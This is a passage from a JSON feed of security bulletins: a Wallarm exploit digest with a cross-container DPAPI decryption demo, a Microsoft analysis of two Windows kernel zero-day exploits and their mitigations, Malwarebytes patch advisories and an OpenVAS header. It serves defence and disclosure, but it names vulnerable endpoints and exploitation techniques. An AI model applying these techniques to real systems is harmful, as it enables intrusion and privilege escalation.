First, start a docker container called Alice on VM1:\n \n \n \\$ docker run --name Alice -it mcr.microsoft.com/dotnet/framework/runtime:4.8-windowsservercore-ltsc2019 cmd.exe\n\nThen, encrypt a file in the Alice container using the powershell script `vault.ps1`: \n \n \n C:\\>powershell.exe -File vault.ps1 -StoreSecret \"This is my secret text\" secret.txt\n C:\\>type secret.txt AQAAA...vJ8aUP9 \n\nStart a docker container Bob on VM2:\n \n \n \\$ docker run --name Bob -it mcr.microsoft.com/dotnet/framework/runtime:4.8-windowsservercore-ltsc2019 cmd.exe\n\nThe next command shows that the file encrypted by Alice on VM1 can be decrypted in the Bob container on VM2:\n \n \n C:\\>powershell.exe -File vault.ps1 secret.txt This is my secret text\n\nNext use the `vault.ps1` PowerShell script from <https://blag.nullteilerfrei.de/2018/01/05/powershell-dpapi-script/>.\n\n* * *\n\n## Other hi-scored exploits published this week: \n\n[**SonLogger 4.2.3.3 Shell Upload (Unauthenticated Arbitrary File Upload)**](<https://vulners.com/packetstorm/PACKETSTORM:161793>)\n\n[CVE-2021-27964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27964>) \n**Score: CVSS 7.5 \nMetasploit +**\n \n \n This module exploits an unauthenticated arbitrary file upload via insecure POST request.\n\n**[Microsoft Exchange 2019 SSRF / Arbitrary File Write](<https://vulners.com/packetstorm/PACKETSTORM:161846>)**\n\n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>) \n**Score: 7.5**\n \n \n This one exploits an SSRF vulnerability in Exchange that allows privileged access to Exchange\u2019s backend resources - one of the four zero-day vulnerabilities in MS Exchange discovered in March.\n\n[**CuteNews 2.1.2 Shell Upload**](<https://vulners.com/packetstorm/PACKETSTORM:161833>)\n\n[CVE-2019-11447](<https://vulners.com/cve/CVE-2019-11447>) \n**Score: CVSS 6.5**\n \n \n An attacker can infiltrate the server through the avatar upload process in the profile area via the 
avatar_file field to index.php?mod=main&opt=personal.\n\n[**LiveZilla Server 8.0.1.0 Cross Site Scripting**](<https://vulners.com/packetstorm/PACKETSTORM:161867>)\n\n[CVE-2019-12962](<https://vulners.com/cve/CVE-2019-12962>) \n**Score: CVSS 4.3**\n \n \n LiveZilla Server before 8.0.1.1 is vulnerable to XSS in mobile/index.php via the Accept-Language HTTP header.\n\nThe post [Weekly exploit digest - March, 15-21 - VMware View Planner, Win32k ConsoleControl, Microsoft Windows Containers DP API](<https://lab.wallarm.com/exploit-digest-march-15-21-vulnerabilities-vmware-win32k-windows-containers/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-21T13:09:00", "type": "wallarmlab", "title": "Weekly exploit digest \u2013 March, 15-21 \u2013 VMware View Planner, Win32k ConsoleControl, Microsoft Windows Containers DP API", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2019-11447", "CVE-2019-12962", "CVE-2021-1645", "CVE-2021-1732", "CVE-2021-21978", "CVE-2021-26855", "CVE-2021-27964"], "modified": "2021-03-21T13:09:00", 
"id": "WALLARMLAB:C5940EBF622709A929825B8B12592EF5", "href": "https://lab.wallarm.com/exploit-digest-march-15-21-vulnerabilities-vmware-win32k-windows-containers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mmpc": [{"lastseen": "2017-06-30T15:02:20", "description": "Cyberattacks involving zero-day exploits happen from time to time, affecting different platforms and applications. Over the years, Microsoft security teams have been working extremely hard to address these attacks. While delivering innovative solutions like [Windows Defender Application Guard](<https://blogs.windows.com/msedgedev/2016/09/27/application-guard-microsoft-edge>), which provides a safe virtualized layer for the Microsoft Edge browser, and [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>), a cloud-based service that identifies breaches using data from built-in Windows 10 sensors, we are hardening the Windows platform with mitigation techniques that can stop exploits of newly discovered and even undisclosed vulnerabilities. As Terry Myerson reiterated in his [blog post](<https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/>), we take our commitment to security innovation very seriously.\n\nA key takeaway from the detonation of zero-day exploits is that each instance represents a valuable opportunity to assess how resilient a platform can be\u2014how mitigation techniques and additional defensive layers can keep cyberattacks at bay while vulnerabilities are being fixed and patches are being deployed. Because it takes time to hunt for vulnerabilities and it is virtually impossible to find all of them, such security enhancements can be critical in preventing attacks based on zero-day exploits.\n\nIn this blog, we look at two recent kernel-level zero-day exploits used by multiple activity groups. 
These kernel-level exploits, based on CVE-2016-7255 and CVE-2016-7256 vulnerabilities, both result in elevation of privileges. Microsoft has promptly fixed the mentioned vulnerabilities in November 2016. However, we are testing the exploits against mitigation techniques delivered in August 2016 with Windows 10 Anniversary Update, hoping to see how these techniques might fare against future zero-day exploits with similar characteristics.\n\n \n\n**CVE** | **Microsoft Update** | **Exploit Type** | **Mitigation in Anniversary Update** \n---|---|---|--- \nCVE-2016-7255 | [MS16-135 (Nov, 2016)](<https://technet.microsoft.com/library/security/MS16-135>) | Win32k Elevation of Privilege Exploit | Strong validation of tagWND structure \nCVE-2016-7256 | [MS16-132 (Nov, 2016)](<https://technet.microsoft.com/library/security/MS16-132>) | Open Type Font Exploit | Isolated Font Parsing (AppContainer) \nStronger validation in font parsing \n \n \n\n## CVE-2016-7255 exploit: Win32k elevation of privilege\n\nIn October 2016, the STRONTIUM attack group launched a spear-phishing campaign targeting a small number of think tanks and nongovernmental organizations in the United States. The campaign, also discussed in [the previously mentioned blog post](<https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/>), involved the use of the exploit for CVE-2016-7255 in tandem with an exploit for the Adobe Flash Player vulnerability CVE-2016-7855.\n\nThe attack group used the Flash exploit to take advantage of a use-after-free vulnerability and access targeted computers. They then leveraged the type-confusion vulnerability in _win32k.sys_ (CVE-2016-7255) to gain elevated privileges.\n\n### Abusing the tagWND.strName kernel structure\n\nIn this section, we\u2019ll go through the internals of the specific exploit for CVE-2016-7255 crafted by the attacker. 
We will show how mitigation techniques provided customers with preemptive protection from the exploit, even before the release of the specific update fixing the vulnerability.\n\n\n\n_Figure 1. Exploit and shellcode phases of this attack _\n\n \n\nModern exploits often rely on read-write (RW) primitives to achieve code execution or gain additional privileges. For this exploit, attackers acquire RW primitives by corrupting _tagWND.strName_ kernel structure. This exploit method is a trend discussed in security conferences and visible to those who investigated actual attacks. For example, we detailed similar findings in a [presentation](<https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/OhFlorio-VB2015.pdf>) about the Duqu 2.0 exploit at Virus Bulletin 2015.\n\nBy reverse engineering its code, we found that the Win32k exploit used by STRONTIUM in October 2016 reused the exact same method. The exploit, after the initial Win32k vulnerability, corrupts _tagWND.strName_ structure and uses _SetWindowTextW_ to write arbitrary content anywhere in kernel memory.\n\n\n\n_Figure 2. SetWindowTextW as a write primitive_\n\n \n\nThe exploit abuses this API call to overwrite data of current processes and copy token privileges of the _SYSTEM_. If successful, the exploit enables the victim process\u2014_iexplore.exe_, in this example\u2014to execute with elevated privileges.\n\n\n\n_Figure 3. Internet Explorer with SYSTEM privileges_\n\n \n\n### Mitigating tagWND exploits with stronger validation\n\nTo mitigate the Win32k exploit and similar exploits, the Windows Offensive Security Research Team (OSR) introduced techniques in the Windows 10 Anniversary Update that prevent abusive use of _tagWND.strName_. This mitigation performs additional checks for the base and length fields, making sure that they are in the expected virtual address ranges and are not usable for RW primitives. 
In our tests on Anniversary Update, exploits using this method to create an RW primitive in the kernel are ineffective. These exploits instead cause exceptions and subsequent blue screen errors.\n\n\n\n_Figure 4. Windows 10 Anniversary Update mitigation on a common kernel write primitive_\n\n \n\nWith the upcoming Windows 10 Creators Update, [Windows Defender ATP](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>) introduces numerous forms of generic kernel exploit detection for deeper visibility into targeted attacks leveraging zero-day exploits. Technical details about the enhanced sensor will be shared in a forthcoming blog post.\n\n## CVE-2016-7256 exploit: Open type font elevation of privilege\n\nAs early as June 2016, unidentified actors began to use an implant detected as \u201cHenkray\u201d in low-volume attacks primarily focused on targets in South Korea. Later, in November 2016, these attackers were detected exploiting a flaw in the Windows font library (CVE-2016-7256) to elevate privileges and install the Henkray backdoor on targeted computers with older versions of Windows.\n\nThe font samples found on affected computers were specifically manipulated with hardcoded addresses and data to reflect actual kernel memory layouts. This indicates the likelihood that a secondary tool dynamically generated the exploit code at the time of infiltration.\n\n\n\n_Figure 5. Auto-generation of font file with exploit_\n\n \n\nThis secondary executable or script tool, which has not been recovered, appears to prepare and drop the font exploit, calculating and preparing the hardcoded offsets needed to exploit the kernel API and the kernel structures on the targeted system. 
Through deep forensic inspection of the binary data found in samples, we extracted all the hardcoded offsets and ascertained the kernel version targeted by this exploit: Windows 8 64-bit.\n\n### Function table corruption for initial code execution\n\nThe font exploit uses _fa_Callbacks_ to corrupt the function table and achieve initial code execution. The callback is called from the CFF parsing function. The following snippet shows a corrupted _ftell_ pointer to a _nt!qsort+0x39_ location in kernel code.\n\n\n\n_Figure 6. fa_Callbacks table corruption_\n\n \n\nThe following snippet shows the code that calls the corrupt function pointer leading to a kernel ROP chain.\n\n\n\n_Figure 7. fa_Callbacks.ftell function call code_\n\n \n\nWhen the corrupted function is called, control jumps to the first ROP gadget at nt!qsort+0x39, which adjusts the stack pointer and initializes some register values from stack values.\n\n\n\n_Figure 8. First ROP gadget_\n\n \n\nAfter the first gadget, the stack points to a kernel ROP chain which calls _ExAllocatePoolWithTag_ to reserve shellcode memory. Another ROP gadget will copy the first 8 bytes of the stage 1 shellcode to the allocated memory.\n\n\n\n_Figure 9. Copying the stage 1 shellcode_\n\n \n\n### Shellcode and privilege escalation\n\nThe stage 1 shellcode is very small. Its main function is to copy the main body of the shellcode to newly allocated memory and run it with a JMP RAX control transfer.\n\n\n\n_Figure 10. Stage 1 shellcode_\n\n \n\nThe main shellcode runs after the copy instructions. The main shellcode\u2014also a small piece of code\u2014performs a well-known token-stealing technique. It then copies the token pointer from a SYSTEM process to the target process, achieving privilege escalation. Both the SYSTEM process and target process PIDs, as well as certain offsets for the kernel APIs needed by the shellcode, are hardcoded in the font sample.\n\n\n\n_Figure 11. 
Token replacement technique_\n\n \n\n### Mitigating font exploits with AppContainer\n\nWhen opening the malicious font sample on Windows 10 Anniversary Update, font parsing happens completely in AppContainer instead of the kernel. AppContainer provides an isolated sandbox that effectively prevents font exploits (among other types of exploits) from gaining escalated privileges. The isolated sandbox considerably reduces font parsing as an attack surface.\n\n\n\n_Figure 12. AppContainer protects against untrusted fonts in Windows 10 Anniversary Update_\n\n \n\nWindows 10 Anniversary Update also includes additional validation for font file parsing. In our tests, the specific exploit code for CVE-2016-7256 simply fails these checks and is unable to reach vulnerable code.\n\n\n\n_Figure 13. Windows 10 font viewer error_\n\n \n\n## Conclusion: Fighting the good fight with exploit mitigation and layered detection\n\nWhile fixing a single-point vulnerability helps neutralize a specific bug, Microsoft security teams continue to look into opportunities to introduce more and more mitigation techniques. Such mitigation techniques can break exploit methods, providing a medium-term tactical benefit, or close entire classes of vulnerabilities for long-term strategic impact.\n\nIn this article, we looked into recent attack campaigns involving two zero-day kernel exploits. We saw how exploit mitigation techniques in Windows 10 Anniversary Update, which was released months before these zero-day attacks, managed to neutralize not only the specific exploits but also their exploit methods. As a result, these mitigation techniques are significantly reducing attack surfaces that would have been available to future zero-day exploits.\n\nBy delivering these mitigation techniques, we are increasing the cost of exploit development, forcing attackers to find ways around new defense layers. 
Even the simple tactical mitigation against popular RW primitives forces the exploit authors to spend more time and resources in finding new attack routes. By moving font parsing code to an isolated container, we significantly reduce the likelihood that font bugs are used as vectors for privilege escalation.\n\nIn addition to the techniques mentioned in this article, Windows 10 Anniversary Update introduced [many other mitigation techniques](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>) in core Windows components and the Microsoft Edge browser, helping protect customers from entire classes of exploits for very recent and even undisclosed vulnerabilities.\n\nFor effective post-breach detection, including cover for the multiple stages of attacks described in this blog post, sign up for Windows Defender ATP. The service leverages built-in sensors to raise alerts for exploits and other attack activity, providing corresponding threat intelligence. 
Customers interested in the Windows Defender ATP post-breach detection solution can find more information [here](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>).\n\n_Microsoft would like to thank [KrCERT](<https://www.krcert.or.kr/>) for their collaboration in protecting customers and for providing the sample for CVE-2016-7256._\n\n \n\n_Matt Oh and Elia Florio, __Windows Defender ATP Research Team_\n\n \n\n_Updates:_\n\nJan 18, 2017 - Corrected the spelling of Henkray backdoor.", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-13T21:28:49", "title": "Hardening Windows 10 with zero-day exploit mitigations", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7855", "CVE-2016-7256", "CVE-2016-7255"], "modified": "2017-01-13T21:28:49", "href": "https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/", "id": "MMPC:11F96360F6FFA25D4AC7028A2E9CAA9D", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "malwarebytes": [{"lastseen": "2022-02-10T00:00:00", "description": 
"If you\u2019re running Windows 10, it\u2019s time to stop delaying those patches and bring your systems up to date as soon as possible.\n\nBleeping Computer [reports](<https://www.bleepingcomputer.com/news/microsoft/windows-vulnerability-with-new-public-exploits-lets-you-become-admin/>) that a researcher has come up with a bypass for an older bug, which could serve up some major headaches if left to fester. Those headaches will take the form of unauthorised admin privileges in Windows 10, alongside creating new admin accounts and more besides.\n\n## What happened the first time round?\n\nBack in 2021, Microsoft patched an exploit which had [been in use](<https://www.bleepingcomputer.com/news/security/recently-fixed-windows-zero-day-actively-exploited-since-mid-2020/>) since mid-2020. Classed as \u201chigh-severity\u201d, \u201cCVE-2021-1732 - Windows Win32k Elevation of Privilege Vulnerability\u201d allowed attackers to elevate privileges to admin level.\n\nFooling potential victims by having them open bogus email attachments is all it would take to get one foot in the door via code execution. It popped up in a [targeted attack](<https://ti.dbappsecurity.com.cn/blog/articles/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) related to the [Bitter APT](<https://www.forbes.com/sites/thomasbrewster/2021/09/17/exodus-american-tech-helped-india-spy-on-china>) campaign. According to the report, numbers were \u201cvery limited\u201d and struck victims in China.\n\n## What\u2019s happening now?\n\nMultiple exploits have dropped for another elevation of privilege vulnerability known as [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>). This is a bypass for the previously mentioned [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732>) which was fixed back in February 2021. CVE-2022-21882 was fixed by Microsoft via updates from January 2022. 
However, sys admins out there may well have skipped the updates due to [various bugs](<https://www.bleepingcomputer.com/news/microsoft/new-windows-server-updates-cause-dc-boot-loops-break-hyper-v/>) which came along for the update ride.\n\n## Time to get fixing things?\n\nIt is absolutely time to get fixing things. The exploit is now out there in the wild, and as Bleeping Computer notes, it \u201caffects all supported support versions of Windows 10 before the January 2022 Patch Tuesday updates\u201d. \n\nWriters at Bleeping Computer were able to get it to work in testing, and others have confirmed it for themselves:\n\n> Interestingly, [#MDE](<https://twitter.com/hashtag/MDE?src=hash&ref_src=twsrc%5Etfw>) detects this PoC as CVE-2021-1732. \nThis is understandable since this [#CVE](<https://twitter.com/hashtag/CVE?src=hash&ref_src=twsrc%5Etfw>)-2022-21882 is a bypass of [#CVE](<https://twitter.com/hashtag/CVE?src=hash&ref_src=twsrc%5Etfw>)-2021-1732. \nGeneric [#LPE](<https://twitter.com/hashtag/LPE?src=hash&ref_src=twsrc%5Etfw>) detection [#KQL](<https://twitter.com/hashtag/KQL?src=hash&ref_src=twsrc%5Etfw>) query works in this case too.[#BlueTeam](<https://twitter.com/hashtag/BlueTeam?src=hash&ref_src=twsrc%5Etfw>) [#ThreatHunting](<https://twitter.com/hashtag/ThreatHunting?src=hash&ref_src=twsrc%5Etfw>)<https://t.co/01El9wPjk0> \n/1 <https://t.co/vM2apKJsI6>\n> \n> -- Bhabesh (@bh4b3sh) [January 29, 2022](<https://twitter.com/bh4b3sh/status/1487449316117516288?ref_src=twsrc%5Etfw>)\n\n## Is there any reason to wait for February\u2019s Patch Tuesday?\n\nIf you\u2019re one of the hold-outs who ran into errors last time around, waiting isn\u2019t advisable. Microsoft already issued an [OOB (out of band) update](<https://www.theverge.com/2022/1/18/22889670/microsoft-windows-server-update-vpn-refs-domain-patch>) to address the multiple errors caused by the January patch. 
As per Microsoft\u2019s January 17th [notification about the release](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#2777>):\n\n> "Microsoft is releasing Out-of-band (OOB) updates today, January 17, 2022, for some versions of Windows. This update addresses issues related to VPN connectivity, Windows Server Domain Controllers restarting, Virtual Machines start failures, and ReFS-formatted removable media failing to mount."\n\nThings being what they are, it\u2019s likely time to get in there and apply the OOB update (if you haven\u2019t already) and put this one to rest.\n\nMicrosoft is putting a fair bit of work into figuring out where weak points lie in the patching process, making use of its Update Connectivity data. The [current estimate](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/achieve-better-patch-compliance-with-update-connectivity-data/ba-p/3073356>) is a device needs a minimum of two continuous connected hours, and six total connected hours after an update is released to reliably make it through the updating process.\n\nIf this sounds like your network, and if you\u2019re still waiting to take the plunge, you\u2019ve hopefully got little to lose by making that big update splash as soon as you possibly can.\n\nThe post [Apply those updates now: CVE bypass offers up admin privileges for Windows 10](<https://blog.malwarebytes.com/malwarebytes-news/2022/02/apply-those-updates-now-cve-bypass-offers-up-admin-privileges-for-windows-10/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 
5.9}, "published": "2022-02-01T11:07:29", "type": "malwarebytes", "title": "Apply those updates now: CVE bypass offers up admin privileges for Windows 10", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-01T11:07:29", "id": "MALWAREBYTES:6A30A2B661E06D2D7D26479F27BB0EF3", "href": "https://blog.malwarebytes.com/malwarebytes-news/2022/02/apply-those-updates-now-cve-bypass-offers-up-admin-privileges-for-windows-10/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-13T13:09:08", "description": "Traditionally the second Tuesday of the month is Microsoft\u2019s \u201cpatch Tuesday\u201d. This is the day when they roll out all the available patches for their software, and their operating systems in particular.\n\nSince there were no less than 56 patches in this month\u2019s issue we will focus on the most important ones. Not that 56 is an awful lot. There were [more than 80 in January](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/microsoft-issues-83-patches-one-for-actively-exploited-vulnerability/>).\n\n### Microsoft CVEs by importance\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). 
The most notable CVEs in this update were:\n\n * [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732>) Windows Win32k elevation of privilege (EoP) vulnerability. This one we listed first as it\u2019s actively exploited in the wild. With an EoP vulnerability attackers can raise their authorization permissions beyond those initially granted. For example, if an attacker gains access to a system but only has read-only permissions they can use an EoP vulnerability to raise them to \u201cread and write\u201d, giving them an option to make unwanted changes.\n * [CVE-2021-26701](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26701>) a .NET Core Remote Code Execution (RCE) vulnerability. A remote code execution (RCE) attack happens when a threat actor illegally accesses and manipulates a computer or server without authorization from its owner. This is the only critical bug Microsoft listed as publicly known.\n * [CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) an IPv4 security vulnerability concerning source routing behavior. Microsoft adds: IPv4 Source routing is considered insecure and is blocked by default in Windows; however, a system will process the request and return an ICMP message denying the request.\n * [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) an IPv6 security vulnerability concerning the reassembly limit and related to the previous one. The reassembly limit controls the IP fragmentation, which is an Internet Protocol (IP) process that breaks packets into smaller fragments, so that the resulting pieces can pass through a link with a smaller maximum transmission unit (MTU) than the original packet size. The fragments are reassembled by the receiving host. 
Apparently an attacker could construct packets such that a large number of fragments could lead to code execution.\n * [CVE-2021-1721](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1721>) a .NET Core and Visual Studio Denial of Service vulnerability. A Denial of Service attack is focused on making a resource (site, application, server) unavailable for its intended purpose.\n * [CVE-2021-1722](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1722>) and [CVE-2021-24077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24077>) are both Windows Fax Service RCE problems. It's important to remember that even if you don\u2019t use \u201cWindows Fax and Scan\u201d, the Windows Fax Service is enabled by default.\n * [CVE-2021-1733](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1733>) is for Sysinternals\u2019 PsExec Elevation of Privilege vulnerability. While this one is listed as not likely to be exploited, the tool itself is worth keeping an eye on, because it's so popular with cybercriminals. They like it because, as a legitimate administration tool, it isn't normally detected as malicious software by default.\n\nIf you are all about prioritizing your updates, these are the ones that we recommend doing first. Everyone else is advised to install the updates at their earliest convenience.\n\nOne other notable thing is the default enabling of the Domain Controller enforcement mode. This was done to counter the effects of the ZeroLogon vulnerability which is being exploited in the wild. We already covered the full story of [ZeroLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/01/the-story-of-zerologon/>) where this change was announced.\n\n### Adobe Reader for a change\n\nAnd while you are about to start your update cycles, you may want to have a look at this one from Adobe. 
Because this one is already actively being exploited as well. Where Adobe was notoriously famous for the bugs in their Flash Player, which has now reached [end-of-life](<https://blog.malwarebytes.com/awareness/2021/01/adobe-flash-player-reaches-end-of-life/>), occasionally a vulnerability in their Reader attracts some attention.\n\n[CVE-2021-21017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-21017>) is a critical heap-based buffer overflow flaw. Heap is the name for a region of a process\u2019 memory which is used to store dynamic variables. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.\n\nSo, by creating a specially crafted input, attackers could use this vulnerability to write code into a memory location where they normally wouldn\u2019t have access. In their advisory Adobe states that it has received a report that CVE-2021-21017 has been exploited in the wild in limited attacks targeting Adobe Reader users on Windows.\n\nBoth Adobe Acrobat and Adobe Reader will automatically detect if a new version of the software is available. The program will check for a new version when you launch either Acrobat or Reader as an application and will prompt you to install a new version when it's available. 
IT administrators can control the update settings by using the [Adobe Customization Wizard](<https://www.adobe.com/nl/devnet-docs/acrobatetk/tools/Wizard/WizardDC/index.html>).\n\nStay safe, everyone!\n\nThe post [Big Patch Tuesday: Microsoft and Adobe fix in-the-wild exploits](<https://blog.malwarebytes.com/malwarebytes-news/2021/02/big-patch-tuesday-microsoft-and-adobe-fix-in-the-wild-exploits/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-10T17:26:33", "type": "malwarebytes", "title": "Big Patch Tuesday: Microsoft and Adobe fix in-the-wild exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1721", "CVE-2021-1722", "CVE-2021-1732", "CVE-2021-1733", "CVE-2021-21017", "CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24094", "CVE-2021-26701"], "modified": "2021-02-10T17:26:33", "id": "MALWAREBYTES:3C358DDA439A247A9677866AFE8FA961", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/02/big-patch-tuesday-microsoft-and-adobe-fix-in-the-wild-exploits/", "cvss": {"score": 6.8, "vector": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-06-10T19:47:59", "description": "This host is missing a important security\n update according to Microsoft Bulletin MS16-135", "cvss3": {}, "published": "2016-11-09T00:00:00", "type": "openvas", "title": "Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (3199135)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7246", "CVE-2016-7218", "CVE-2016-7214", "CVE-2016-7255", "CVE-2016-7215"], "modified": "2020-06-08T00:00:00", "id": "OPENVAS:1361412562310809092", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809092", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (3199135)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
